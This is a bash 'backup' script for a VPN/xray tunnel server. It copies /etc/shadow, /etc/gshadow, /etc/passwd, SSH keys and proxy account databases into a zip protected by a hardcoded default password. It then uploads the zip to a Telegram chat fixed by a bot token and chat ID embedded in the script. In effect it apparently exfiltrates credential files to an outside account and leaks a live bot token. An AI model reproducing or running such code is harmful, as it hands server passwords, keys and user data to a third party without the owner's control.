#!/bin/bash
# COLOR VALIDATION
clear
RED='\033[0;31m'
NC='\033[0m'
gray="\e[1;30m"
Blue="\033[0;34m"
green='\033[0;32m'
grenbo="\e[92;1m"
YELL='\033[0;33m'
BG_BLU="\033[44;1m" # BG BIRU
# Getting
domain=$(cat /etc/xray/domain)
MYIP=$(curl -sS ipv4.icanhazip.com)
IP=$(wget -qO- icanhazip.com)
dateToday=$(date +"%Y-%m-%d")
Name=$(curl https://raw.githubusercontent.com/rosistore/izin/main/ip | grep $MYIP | awk '{print $2}')
clear
botBackup() {
    switch=on
    bottoken=7358249397:AAE8NW4OL1T-H13kdYyEzTT0z6Nyx-6DubU
    adminid=6646907804
	if [[ -z $InputPass ]]; then
	InputPass="Ari123Ok"
	fi
    mkdir /root/backup &>/dev/null
	cp /etc/passwd backup/ &>/dev/null
	cp /etc/group backup/ &>/dev/null
	cp /etc/shadow backup/ &>/dev/null
	cp /etc/gshadow backup/ &>/dev/null
cp /etc/crontab backup/ &>/dev/null
cp /etc/vmess/.vmess.db backup/ &>/dev/null
cp /etc/ssh/.ssh.db backup/ &>/dev/null
cp /etc/vless/.vless.db backup/ &>/dev/null
cp /etc/trojan/.trojan.db backup/ &>/dev/null
cp /etc/bot/.bot.db backup/ &>/dev/null
cp -r /etc/kyt/limit backup/ &>/dev/null
cp -r /etc/limit backup/qt/ &>/dev/null
cp -r /etc/ssh backup/ssh &>/dev/null
cp -r /etc/slowdns backup/slowdns &>/dev/null
cp -r /var/lib/kyt/ backup/kyt  &>/dev/null
cp -r /etc/xray backup/xray &>/dev/null 
cp -r /var/www/html/ backup/html &>/dev/null
cp -r /etc/banner.txt backup/banner.txt &>/dev/null
cp -r /etc/kyt/limit backup/limit &>/dev/null
cp -r /etc/vmess backup/vmess &>/dev/null
cp -r /etc/trojan backup/trojan &>/dev/null
cp -r /etc/vless backup/vless &>/dev/null
cp -r /etc/shadowsock backup/shadowsock &>/dev/null
cd /root &>/dev/null
zip -rP "$InputPass" "$Name-$domain-$IP-$dateToday.zip" backup >/dev/null 2>&1

    curl -Ss --request POST \
        --url "https://api.telegram.org/bot${bottoken}/sendDocument?chat_id=${adminid}&caption=Here Your Backup Today : ${dateToday}" \
        --header 'content-type: multipart/form-data' \
        --form document=@"/root/$Name-$domain-$IP-$dateToday.zip" >/root/t1

    fileId=$(grep -o '"file_id":"[^"]*' /root/t1 | grep -o '[^"]*$')

    curl -Ss --request GET \
        --url "https://api.telegram.org/bot${bottoken}/getfile?file_id=${fileId}" >/root/t1

    filePath=$(grep -o '"file_path":"[^"]'* /root/t1 | grep -o '[^"]*$')

    curl -Ss --request GET \
        --url "https://api.telegram.org/bot${bottoken}/sendMessage?chat_id=${adminid}&text=File ID   : <code>${fileId}</code>&parse_mode=html" &>/dev/null
    curl -Ss --request GET \
        --url "https://api.telegram.org/bot${bottoken}/sendMessage?chat_id=${adminid}&text=File Path : <code>${filePath}</code>&parse_mode=html" &>/dev/null
clear
    echo -e "[ INFO ] • Done Backup... "
    echo -e "File ID   : ${fileId}"
    echo -e "File Path : ${filePath}"
    rm -rf /root/backup
    rm -r /root/$Name-$domain-$IP-$dateToday.zip
    rm -f /root/t1
}
    botBackup